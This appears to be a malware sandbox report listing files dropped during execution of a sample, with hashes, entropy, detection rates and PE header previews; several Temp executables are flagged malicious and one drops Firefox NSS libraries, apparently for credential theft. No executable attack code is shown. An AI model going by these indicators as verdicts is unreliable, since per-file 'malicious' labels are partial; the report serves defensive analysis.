MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\CA2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11133437643972156
Encrypted:	false
SSDEEP:	12:dfXm/Ey6q9995gSekXg1Q10nMCldimE8eawHjcoc:Al682dcyMCldzE9BHjcj
MD5:	B0215A5A2820E5640BC64C7DB9611E46
SHA1:	27CF30D69A2092694F742AA8ACDC534BF68D1E67
SHA-256:	938EF2EB9957889B2799B9330135AEE0BE285C9F710B31C0F830913922C8004C
SHA-512:	79997693E0D83EB426225552EB47AEBBEBE2EE010631FDDEE0BFC6CF33195595ADB8DC0CF27BFC38175DDF41B04A73855A08B819D89A5B62DEEDFEC768E27BC3
Malicious:	false
Reputation:	unknown
Preview:	................................................................................x.........P......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... .....s.-!............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.x.........P.............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11381075623519665
Encrypted:	false
SSDEEP:	12:OCyTXm/Ey6q9995gP1miUkXg1Q10nMCldimE8eawHza1miIJqj3:OCyKl682P1tUcyMCldzE9BHza1tIJqj3
MD5:	23843E34B8B802FD447254ECD9A261C6
SHA1:	D443556FA54791F3D191D13458F9D5AEE1D0EE6B
SHA-256:	D990425E8BA35B36F7A97E4721C729ABCC312427695F1721975E4E761CD2F3A6
SHA-512:	786FD644ACFCAA19A0CE569361DCE1F3682ABE0BEB8C43221BBADA44D9ACDD1F0D05EA66FA5CF55C53E6116F1560735E1B6D4EEBDD32858C8FF41D5789D14245
Malicious:	false
Reputation:	unknown
Preview:	............................................................................ ...x.........O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... ......&!............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.x.........O.............................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11378339426766004
Encrypted:	false
SSDEEP:	12:OCy7lmXm/Ey6q9995gA1mK21kXg1Q10nMCldimE8eawHza1mKC:OCy7lzl682A1i1cyMCldzE9BHza1e
MD5:	F661E792F91CCA8D4A38E46FD160565D
SHA1:	A881A5F40A67AE47A4F9E075FCD94A435989EEA8
SHA-256:	E723993110A47629204D7E384A3FF6E52D800CCF2772693CF0EAE7626339FF99
SHA-512:	CFDDE582941B8C0401544F4725BE24F9F2927EA32057A6489394AC05008B7872BACC5667F32E1C1C3625784CBB397F73D436C1D02FF6DEEB5CB52A6919E5F49E
Malicious:	false
Reputation:	unknown
Preview:	............................................................................ ...x........LL......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................vU-..... ......S.!............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.x.........L.............................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\876504d2-be03-42d9-b2f9-6ed891d3a9d2\ .dll Download File
Process:	C:\Users\user\AppData\Local\Temp\C481.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	145173
Entropy (8bit):	6.364932145314629
Encrypted:	false
SSDEEP:	3072:2vHGxvpTI1xUSnsEYVA+9yaJAUiXbNxqAmi3zGDm/8S:mmwWmrtPTj9jGq/8S
MD5:	E8641F344213CA05D8B5264B5F4E2DEE
SHA1:	96729E31F9B805800B2248FD22A4B53E226C8309
SHA-256:	85E82B9E9200E798E8F434459EACEE03ED9818CC6C9A513FE083E72D48884E24
SHA-512:	3130F32C100ECB97083AD8AC4C67863E9CEED3A9B06FC464D1AEEAEC389F74C8BF56F4CE04F6450FD2CC0FA861D085101C433CFA4BEC3095F8EBEEB53B739109
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.6.\.e.\.e.\.e.%e.\.e.$.e.\.e.\.e.\.e..e.\.e...e.\.e..%e.\.e...e.\.e...e.\.e...e.\.eRich.\.e........................PE..d.....v\.........." .........0......P................................................9....@.............................................s.......x....@.......0...............P..........................................p.......................`....................text............................... ..`.rdata..............................@..@.data...X.... ......................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc...!...P...!..................`...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AC25.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.000383259800236
Encrypted:	false
SSDEEP:	96:wpMyid82EdNqPXX9vO2wiEz7pc7vEroIQ9dNcfKdroIZdNg5sZroI7DNgsFlZgN+:w2d82Edwftwi+pAe45D4mdlMiY
MD5:	A69E12607D01237460808FA1709E5E86
SHA1:	4A12F82AEE1C90E70CDF6BE863CE1A749C8AE411
SHA-256:	188E05EFB42C1F7FDB5C910A6614F710A87AE642B23AC9FFE3F75246744865BC
SHA-512:	7533E6DA6BAC0405FC8B608DA8020B54B6EE02592E6FD40EA342E130A8A876AE5EF4A1FD636D95E76339DBF8BE45CECBD22CA2D0A4635B055FFAFEC3D7E15284
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...........6......5.....t5.....Rich.*..................PE..L.....:].................0... ......x........@....@..........................`.......b......................................T...(....P..\|...................................................................0... ....................................text...P".......0.................. ..`.data........@.......@..............@....rsrc...\|....P.......P..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B483.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	7.704587837190729
Encrypted:	false
SSDEEP:	6144:SpYoqzhV+WTyOy9w6auup9o44zi77Gmx36wcHoNhQ5InUGqkVTPbD+bIzZ1ZsWzo:S2dhV+j2z9o448FLQAlDbtso2
MD5:	C633B1E68DCFFDAE991C3F2D2D4FFFA5
SHA1:	A1ED4D1100C46B6FBC64026B5114FB568812B340
SHA-256:	CD2C1DEDBC8879403936CE9F750EED4ACC6C2422088C7180377C88C58AD1226C
SHA-512:	AF84435137376603E9865C4E7E5FA742649127E17B4DE8B84F50C586890895BC5AEB208E7AE398C40C767D5DBD435A69E2214CF1130BD8D2E377CE52B6608254
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_.................n...z.......$............@.................................................................0...Q......<.......................................................... ..........@............................................text....l.......n.................. ..`.rdata...@.......B...r..............@..@.data...8.......:..................@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C481.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	542208
Entropy (8bit):	7.728739568256964
Encrypted:	false
SSDEEP:	12288:EVklBY4cFhfU+rFDAGOmw8E5X4TnBhsaMJcR/V:EVklBRcrf/FDAGOmSunBhsId
MD5:	68D5331A8418C4089BB7C0F524C77728
SHA1:	9FF36FB8F4132B44AF8483BF6CA8CE82B9BE8236
SHA-256:	6004220AA5D81F1B80C49CA0E18F8332292AE4E2B09898469C04CF96460359B1
SHA-512:	BA859C3D25A4BF4C321E9869F147800C6767AE9B51CF145317F83EB25D7D66ADFEDAAFB668A312B9FFD15F05F076EFE309ABF11F7BE21CD1FFD5B7920B797A2F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......B.......4... ........@.. ....................................@..................................3..W....@..X..........................04............................................... ............... ..H............text........ ...................... ..`.rsrc...X...@...,..................@..@.reloc...............D..............@..B.................3......H.......0_..$F...............V..........................................\./.?.@.#.:.[.]...............9.........t.+...$61l.....y]4.....&.[c.%j.$._T.^..z.....M.'.....,k..7L.3..\....5...:.vV@..<..0...........(.................4....0.....................UU..4....0.........................4....0.....................77..4....0.....................77..4....0.....................77..4....0.....................77..4....0.........................4....0..........*...A.......

C:\Users\user\AppData\Local\Temp\CA2F.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	624640
Entropy (8bit):	7.668662071231235
Encrypted:	false
SSDEEP:	12288:3VYXfoXc/96ZuQa+OfbgtNTd4R/Ke/8x/TYNNs4FhWAcxPhdp/:woXcd+Y2EBK+8xs0XAcxLp/
MD5:	BF40705CBA9708182B61956985895005
SHA1:	174C659E0D225B1EA0EB5A7E8D30911D17AD06A4
SHA-256:	6325C9FFBEDD8D4A4D676D6DC5E790E6D99A65F1E3C621DF7EC275AB7B047565
SHA-512:	F01C4764675238503776B00B0B72E0727C531908499043B4043029F495DC2F8C19DB281C98EC00FDC74E5A67ECFBC7F04A2C10FEFB0BA03E5D28B9D8DE292600
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&..zb..)b..)b..)\|.')...)\|.1).)\|.6)Z..)Em.)e..)b..).)\|.8)c..)\|.&)c..)\|.#)c..)Richb..)........PE..L...@9[^.................L...................`....@.......................... ......Cr......................................,...P.......`5..........................`b..................................@............`...............................text....K.......L.................. ..`.rdata.......`.......P..............@..@.data...\|........R..................@....rsrc...`5.......6...R..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D711.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3238840
Entropy (8bit):	7.865140899006048
Encrypted:	false
SSDEEP:	49152:s0jllSZDgpa/IkggmZW+GDlUbT5e3XVs2P7JnbUdLd27EjQvAPP:/lEOalV6aabNe3XVxP5b+47oQv0P
MD5:	9AA6DD10E0BFB49BAA17F04F44B9DCD3
SHA1:	09AD5A6AE8A6396E7BDF783CD124417CD7515C7A
SHA-256:	A07CF8A0E1FADC8AB20DBE35341F1FEBB3A0B2E42C8F5991C0CC397B130D7621
SHA-512:	601F36F703EE396DBA325349AA25440270C1CEE6E069146C1ED7F03E96FE5FC30DEAD138E7F3B713549B815635E64AA97A10054E71A415690E622C417BBFBB4D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........................&......P.P.. ... ....@.. .......................@\|.....".1...@.................................:...P.....z.............^1..............................................................................................text........ ...................... ..`.sdata....... ......................@... .....@......................@..@.reloc.......`......................@..@.idata... ..........................@...\| ..............................`..`.themida..G..@......................`....boot....d.. P..d..J..............`..`.rsrc........z......./.............@..@........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11133437643972156
Encrypted:	false
SSDEEP:	12:dfXm/Ey6q9995gSekXg1Q10nMCldimE8eawHjcoc:Al682dcyMCldzE9BHjcj
MD5:	B0215A5A2820E5640BC64C7DB9611E46
SHA1:	27CF30D69A2092694F742AA8ACDC534BF68D1E67
SHA-256:	938EF2EB9957889B2799B9330135AEE0BE285C9F710B31C0F830913922C8004C
SHA-512:	79997693E0D83EB426225552EB47AEBBEBE2EE010631FDDEE0BFC6CF33195595ADB8DC0CF27BFC38175DDF41B04A73855A08B819D89A5B62DEEDFEC768E27BC3
Malicious:	false
Reputation:	unknown
